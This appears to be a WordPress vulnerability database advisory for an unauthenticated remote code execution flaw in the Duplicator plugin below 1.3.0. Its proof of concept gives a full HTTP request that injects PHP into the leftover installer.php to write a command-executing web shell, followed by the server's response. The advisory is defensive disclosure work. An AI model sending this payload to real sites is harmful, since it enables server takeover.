WordPress Plugin Vulnerabilities
Duplicator < 1.3.0 - Unauthenticated RCE
Description
The plugin does not properly escape values when its installer script replaces values in WordPress configuration files. If this installer script is left on the site after use, it could be use to run arbitrary code on the server.
Proof of Concept
****Steps to Reproduce***** ***Setup*** Download WAMP with the following config: - WAMP - v3.3.2 - Phpmyadmin - v4.9.11 - Apache - v2.4.58 - PHP - v5.6.40 - MySQL - v5.6.51 - MariaDB - v5.5.62 - Wordpress - v4.6 ***Simulating admin forgetting to remove the installer.php files post-installation *** 1) Download Duplicator 1.1.6 from https://downloads.wordpress.org/plugin/duplicator.1.1.6.zip install plugin your wordpress site via the admin dashboard and activate it. 2) navigate to the 'duplicator' tab on the admin dashboard. 3) Click on 'create new' and follow the steps to generate a installer.php file. 4) Download the installer.php file and place it on your wordpress directory to simulate a administrator forgetting to remove the installer.php and/or installer-backup.php files post-installation. ****POC****** **Request** POST /wordpress/installer.php HTTP/1.1 Host: 127.0.0.1 Content-Length: 124 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Connection: close action_ajax=2&action_step=2&url_new=TESTING');file_put_contents("Delvy.php",'<pre><?php system($_GET["cmd"]); ?></pre>'); /* **Response** HTTP/1.1 200 OK Date: Fri, 08 Dec 2023 14:53:40 GMT Server: Apache/2.4.58 (Win64) PHP/5.6.40 mod_fcgid/2.3.10-dev X-Powered-By: PHP/5.6.40 Content-Length: 529 Connection: close Content-Type: text/html; charset=UTF-8 {"step1":null,"step2":{"scan_tables":0,"scan_rows":0,"scan_cells":0,"updt_tables":0,"updt_rows":0,"updt_cells":0,"errsql":[],"errser":[],"errkey":[],"errsql_sum":0,"errser_sum":0,"errkey_sum":0,"time":"0.0000 sec.","err_all":0,"warn_all":1,"warnlist":["WP-CONFIG WARNING: The wp-config.php has one or more of these values \"WP_CONTENT_DIR, WP_CONTENT_URL, WPCACHEHOME, COOKIE_DOMAIN, WP_SITEURL, WP_HOME, WP_TEMP_DIR\" which may cause issues please validate these values by opening the file."],"pass":1}} ***Important*** Do note that if the following POC is ran on an apache server it will DOS the web app!!!
Affects Plugins
References
CVE
Classification
Type
RCE
OWASP top 10
CWE
Miscellaneous
Submitter
Jeremy Lim
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2023-12-15 (about 4 months ago)
Added
2023-12-15 (about 4 months ago)
Last Updated
2023-12-15 (about 4 months ago)